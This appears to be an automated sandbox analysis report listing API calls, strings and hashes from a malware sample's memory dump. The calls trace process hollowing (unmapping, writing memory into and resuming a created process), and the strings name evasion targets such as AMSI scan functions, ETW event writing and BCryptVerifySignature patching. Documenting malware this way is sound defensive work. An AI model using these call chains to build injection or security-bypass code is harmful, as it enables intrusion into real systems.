                  • Instruction ID: 814c10c1a5787cefc605e0fbef99da55e99292fa8da0d8991e8a5a6337c93951
                  • Opcode Fuzzy Hash: c96ad9f9f81323b228b2f437788a85b5fa3e7182a18aa727f16b3f68cc2f55e5
                  • Instruction Fuzzy Hash: 2BE0867D3003016FD7505A7D5DC8712ABD8EB48774F144475F609DB2C1D760E8108B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 02817BE8: LoadLibraryW.KERNEL32(?,00000000,02817C9A), ref: 02817C18
                    • Part of subcall function 02817BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02817C9A), ref: 02817C1E
                    • Part of subcall function 02817BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02817C37
                    • Part of subcall function 02802EE0: QueryPerformanceCounter.KERNEL32 ref: 02802EE4
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,02864344,02828FEC,OpenSession,02864344,02828FEC,UacScan,02864344,02828FEC,ScanBuffer,02864344,02828FEC), ref: 0282681D
                    • Part of subcall function 02817968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02817975
                    • Part of subcall function 02817968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0281797B
                  • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,00000000,ScanBuffer,02864344,02828FEC,OpenSession,02864344,02828FEC,UacScan,02864344,02828FEC,ScanBuffer,02864344,02828FEC,OpenSession,02864344), ref: 02826B4F
                    • Part of subcall function 02807E18: GetFileAttributesA.KERNEL32(00000000,?,0281E0EE,ScanString,02864344,02828FEC,OpenSession,02864344,02828FEC,ScanString,02864344,02828FEC,UacScan,02864344,02828FEC,UacInitialize), ref: 02807E23
                    • Part of subcall function 0281C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0281C4CA), ref: 0281C437
                    • Part of subcall function 0281C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0281C471
                    • Part of subcall function 0281C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0281C49E
                    • Part of subcall function 0281C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0281C4A7
                  • ExitProcess.KERNEL32(00000000,ScanBuffer,02864344,02828FEC,OpenSession,02864344,02828FEC,Initialize,02864344,02828FEC,ScanString,02864344,02828FEC,OpenSession,02864344,02828FEC), ref: 02828B96
                    • Part of subcall function 02804C24: SysFreeString.OLEAUT32(0281D42C), ref: 02804C32
                    • Part of subcall function 02804C3C: SysFreeString.OLEAUT32 ref: 02804C4F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$AddressFreeHandleModulePathProcProcessString$AttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesNameName_PerformanceQuerySystemWrite
                  • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                  • API String ID: 2130125929-2845693168
                  • Opcode ID: 574e7ad5f8a284fd3038bafca54181b1486a2bc1a87db28dbb3889342b59075e
                  • Instruction ID: a659a0d4b451f6fa43f5e5d3ec9d9fb4c9b31dfa4107d70f2a87eb3fca7db4fb
                  • Opcode Fuzzy Hash: 574e7ad5f8a284fd3038bafca54181b1486a2bc1a87db28dbb3889342b59075e
                  • Instruction Fuzzy Hash: 1243FF3CA811698FDB91EB68DCC09DE73BAEF45301F5044E1E109E7690DB70AE898F56
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02819E1B,?,?,02819EAD,00000000,02819F89), ref: 02819BA8
                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02819BC0
                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02819BD2
                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02819BE4
                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02819BF6
                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02819C08
                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02819C1A
                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02819C2C
                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02819C3E
                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02819C50
                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02819C62
                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02819C74
                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02819C86
                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02819C98
                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02819CAA
                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02819CBC
                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02819CCE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                  • API String ID: 667068680-597814768
                  • Opcode ID: 992ab3877ceee56dfc373f23d24a2cdcf20869e3da2b12c0fe537bd2307075e9
                  • Instruction ID: 4ac589a94e29a70d7ef8c8c7b2073366ed19dbc4d7679494b11f1f1867e8da14
                  • Opcode Fuzzy Hash: 992ab3877ceee56dfc373f23d24a2cdcf20869e3da2b12c0fe537bd2307075e9
                  • Instruction Fuzzy Hash: 713130BC9422209FFB50AFF8D8DAE1937ADEB02700B405965E025CF6C5D778A420CF12
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 02817BE8: LoadLibraryW.KERNEL32(?,00000000,02817C9A), ref: 02817C18
                    • Part of subcall function 02817BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02817C9A), ref: 02817C1E
                    • Part of subcall function 02817BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02817C37
                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02864398,02864388,OpenSession,02864360,02819A30,ScanString,02864360), ref: 02818446
                  • GetThreadContext.KERNEL32(00000000,028643DC,ScanString,02864360,02819A30,UacInitialize,02864360,02819A30,ScanBuffer,02864360,02819A30,ScanBuffer,02864360,02819A30,UacInitialize,02864360), ref: 028187DF
                  • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,028644B0,00000004,028644B8,ScanBuffer,02864360,02819A30,ScanString,02864360,02819A30,Initialize,02864360,02819A30,UacScan,02864360), ref: 02818A3C
                  • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02864360,02819A30,ScanString,02864360,02819A30,Initialize,02864360,02819A30,00000000,-00000008,028644B0,00000004,028644B8), ref: 02818BB7
                    • Part of subcall function 02817968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02817975
                    • Part of subcall function 02817968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0281797B
                  • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,028644B8,ScanBuffer,02864360,02819A30,ScanString,02864360,02819A30,Initialize,02864360,02819A30,ScanBuffer,02864360), ref: 0281920B
                  • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,028644B4,00000004,028644B8,ScanBuffer,02864360,02819A30,ScanString,02864360,02819A30,Initialize,02864360,02819A30,00000000,00000000), ref: 0281937E
                  • SetThreadContext.KERNEL32(00000000,028643DC,ScanBuffer,02864360,02819A30,ScanString,02864360,02819A30,Initialize,02864360,02819A30,00000000,-00000008,028644B4,00000004,028644B8), ref: 028194F4
                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,028643DC,ScanBuffer,02864360,02819A30,ScanString,02864360,02819A30,Initialize,02864360,02819A30,00000000,-00000008,028644B4), ref: 02819501
                    • Part of subcall function 02817AC0: LoadLibraryW.KERNEL32(bcrypt,02819A30,Initialize,02864360,02819A30,UacScan,02864360,02819A30,UacInitialize,02864360,02819A30,00000000,028643DC,ScanString,02864360,02819A30), ref: 02817AD2
                    • Part of subcall function 02817AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02817ADF
                    • Part of subcall function 02817AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02819A30,Initialize,02864360,02819A30,UacScan,02864360,02819A30,UacInitialize), ref: 02817AF6
                    • Part of subcall function 02817AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02819A30,Initialize,02864360,02819A30,UacScan,02864360,02819A30,UacInitialize,02864360,02819A30,00000000,028643DC), ref: 02817B05
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$CreateFreeProcessReadResumeSectionUnmapUserView
                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                  • API String ID: 2712731507-2367850715
                  • Opcode ID: 01fcd8d221e6d15b2c88b0a7961383f5b4a3d189896c117688ee2546329cac4c
                  • Instruction ID: 4579ae9ec009be264de4b9eafdf28f9f3a2ceb6a4f8ed88e3c2989534fd227ba
                  • Opcode Fuzzy Hash: 01fcd8d221e6d15b2c88b0a7961383f5b4a3d189896c117688ee2546329cac4c
                  • Instruction Fuzzy Hash: 4EE2103CA811689BDB51E798DCD0EDE73BAAF45700F1085A1D209E73D4DA70AE89CF52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 02817BE8: LoadLibraryW.KERNEL32(?,00000000,02817C9A), ref: 02817C18
                    • Part of subcall function 02817BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02817C9A), ref: 02817C1E
                    • Part of subcall function 02817BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02817C37
                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02864398,02864388,OpenSession,02864360,02819A30,ScanString,02864360), ref: 02818446
                  • GetThreadContext.KERNEL32(00000000,028643DC,ScanString,02864360,02819A30,UacInitialize,02864360,02819A30,ScanBuffer,02864360,02819A30,ScanBuffer,02864360,02819A30,UacInitialize,02864360), ref: 028187DF
                  • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,028644B0,00000004,028644B8,ScanBuffer,02864360,02819A30,ScanString,02864360,02819A30,Initialize,02864360,02819A30,UacScan,02864360), ref: 02818A3C
                  • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02864360,02819A30,ScanString,02864360,02819A30,Initialize,02864360,02819A30,00000000,-00000008,028644B0,00000004,028644B8), ref: 02818BB7
                    • Part of subcall function 02817968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02817975
                    • Part of subcall function 02817968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0281797B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc$ContextCreateLibraryLoadMemoryProcessReadSectionThreadUnmapUserViewVirtual
                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                  • API String ID: 103113800-2367850715
                  • Opcode ID: 72e51ed72ca137de5f385c4d19a1d8647d6bc730332e9aa9d06b06a2878f668b
                  • Instruction ID: 68de1f17d9f58a58a716f1a058cfe6c2833c5d25f73249fa66b884eff0797e59
                  • Opcode Fuzzy Hash: 72e51ed72ca137de5f385c4d19a1d8647d6bc730332e9aa9d06b06a2878f668b
                  • Instruction Fuzzy Hash: 36E2103CA811689BDB51E798DCD0EDE73BAAF45700F1045A1D209E73D4DA70AE89CF52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll,02806BD0,02800000,0282B790), ref: 028058E9
                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02805900
                  • lstrcpynA.KERNEL32(?,?,?), ref: 02805930
                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02806BD0,02800000,0282B790), ref: 02805994
                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02806BD0,02800000,0282B790), ref: 028059CA
                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02806BD0,02800000,0282B790), ref: 028059DD
                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02806BD0,02800000,0282B790), ref: 028059EF
                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02806BD0,02800000,0282B790), ref: 028059FB
                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02806BD0,02800000), ref: 02805A2F
                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02806BD0), ref: 02805A3B
                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02805A5D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                  • String ID: GetLongPathNameA$\$kernel32.dll
                  • API String ID: 3245196872-1565342463
                  • Opcode ID: 9c6ea37b7171a9fc53e48e5f13308bd9729e25cc50e6e3b95876720638ecb616
                  • Instruction ID: 39afdb6a928ade94155cf73f5637f8eb00ad06899cb5b53ba17e473ca9325262
                  • Opcode Fuzzy Hash: 9c6ea37b7171a9fc53e48e5f13308bd9729e25cc50e6e3b95876720638ecb616
                  • Instruction Fuzzy Hash: 30415C7EE00218AFDB50DAE8CCC8ADEB7ADBF08354F4845A5A549D7280E7349F448F64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 02817BE8: LoadLibraryW.KERNEL32(?,00000000,02817C9A), ref: 02817C18
                    • Part of subcall function 02817BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02817C9A), ref: 02817C1E
                    • Part of subcall function 02817BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02817C37
                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02864644,02864688,ScanString,02864344,0281D0A4,OpenSession,02864344), ref: 0281CDD3
                  • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02864344,0281D0A4,OpenSession,02864344,0281D0A4,ScanString,02864344,0281D0A4,OpenSession,02864344,0281D0A4,UacScan,02864344), ref: 0281D01F
                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02864344,0281D0A4,OpenSession,02864344,0281D0A4,ScanString,02864344,0281D0A4,OpenSession,02864344,0281D0A4,UacScan), ref: 0281D02A
                  • CloseHandle.KERNEL32(00000000,00000000,00000000,000000FF,ScanString,02864344,0281D0A4,OpenSession,02864344,0281D0A4,ScanString,02864344,0281D0A4,OpenSession,02864344,0281D0A4), ref: 0281D035
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
                  • String ID: Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                  • API String ID: 1205125484-661810597
                  • Opcode ID: 9083f88d7c989ca26356c47484c9548af24db0f6c5423d34b292c2b4f9e9314c
                  • Instruction ID: 4786fba421faaa991687a79c4f1d35bb65d1d3441e110f3383447aca71606ce3
                  • Opcode Fuzzy Hash: 9083f88d7c989ca26356c47484c9548af24db0f6c5423d34b292c2b4f9e9314c
                  • Instruction Fuzzy Hash: 09F1F03CA811589FEB50FBA8DCC0FDE73BAAF45701F108461A204EB295DA74ED468F52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02805BAC
                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02805BB9
                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02805BBF
                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02805BEA
                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02805C31
                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02805C41
                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02805C69
                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02805C79
                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02805C9F
                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02805CAF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                  • API String ID: 1599918012-2375825460
                  • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                  • Instruction ID: 4b7cdc1687c363fc988b0d0e45c8d52a2b8d2db3e0f2893e4c4ede4016c609d7
                  • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                  • Instruction Fuzzy Hash: 553195BDE4011C2AFB65D6B8CCC9FDE77AD5B04390F4401A1A648E61C1D7789F848F61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(bcrypt,02819A30,Initialize,02864360,02819A30,UacScan,02864360,02819A30,UacInitialize,02864360,02819A30,00000000,028643DC,ScanString,02864360,02819A30), ref: 02817AD2
                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02817ADF
                  • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02819A30,Initialize,02864360,02819A30,UacScan,02864360,02819A30,UacInitialize), ref: 02817AF6
                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02819A30,Initialize,02864360,02819A30,UacScan,02864360,02819A30,UacInitialize,02864360,02819A30,00000000,028643DC), ref: 02817B05
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                  • String ID: BCryptVerifySignature$bcrypt
                  • API String ID: 1002360270-4067648912
                  • Opcode ID: d2a3008a50399d88397a102e4969a90be7e333f7e414e1e715cc2db803d12723
                  • Instruction ID: 7a9798ad833fc89737e93157b0560ab06c4a5429b61df88fdf77073b7ca10809
                  • Opcode Fuzzy Hash: d2a3008a50399d88397a102e4969a90be7e333f7e414e1e715cc2db803d12723
                  • Instruction Fuzzy Hash: B5F0E97D5053243EE12161685C80EBF626DCBC2761F00462DF558D61C0E7658904C7B2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 02804EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02804EF2
                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0281C4CA), ref: 0281C437
                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0281C471
                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0281C49E
                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0281C4A7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                  • String ID:
                  • API String ID: 3764614163-0
                  • Opcode ID: ee99c3eb69308b38097ebde28e9367bf144ba58ce114615a87a06a75c1c52724
                  • Instruction ID: 21f6a41c8ab723bcbaedf284b03fa7efa3d95b713fc7456dbd647716b078a6e9
                  • Opcode Fuzzy Hash: ee99c3eb69308b38097ebde28e9367bf144ba58ce114615a87a06a75c1c52724
                  • Instruction Fuzzy Hash: D721C579A80208BAEB50DA94CD42FEEB7BDEB04710F504465B604F71D0D7B47E048A55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 02804EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02804EF2
                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0281C4CA), ref: 0281C437
                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0281C471
                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0281C49E
                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0281C4A7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                  • String ID:
                  • API String ID: 3764614163-0
                  • Opcode ID: 47d779ccd701c71919af411dc84e7ed8b4212f35aa2db07f85a12c5f9082548a
                  • Instruction ID: 6a10ce9849049fc935e0fc35c9c5f2fbfa41b37667b2fb2457297a96a02404d4
                  • Opcode Fuzzy Hash: 47d779ccd701c71919af411dc84e7ed8b4212f35aa2db07f85a12c5f9082548a
                  • Instruction Fuzzy Hash: C821C279A80208BAEB50EA94CD82FDEB7BDEB04B10F504466B604F71D0D7B47E048A56
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 02804EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02804EF2
                  • RtlInitUnicodeString.N(?,?,00000000,0281C3E2), ref: 0281C390
                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0281C3E2), ref: 0281C3A6
                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0281C3E2), ref: 0281C3C5
                    • Part of subcall function 02804C24: SysFreeString.OLEAUT32(0281D42C), ref: 02804C32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                  • String ID:
                  • API String ID: 1694942484-0
                  • Opcode ID: 74295c41b41e4c2996b05ee24df11600de632fcacabb0892f5cd7a532383f941
                  • Instruction ID: 7dcb1c1afa5ed0810300297ac2ff7c0abe2a23c3be40e8a0c3d6ccdb14941c8b
                  • Opcode Fuzzy Hash: 74295c41b41e4c2996b05ee24df11600de632fcacabb0892f5cd7a532383f941
                  • Instruction Fuzzy Hash: 8701F87D980208BADB01EBA4CD81FCDB3FDEB48700F504462A605E61C0E7746B048A66
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02807FB1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: DiskFreeSpace
                  • String ID:
                  • API String ID: 1705453755-0
                  • Opcode ID: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
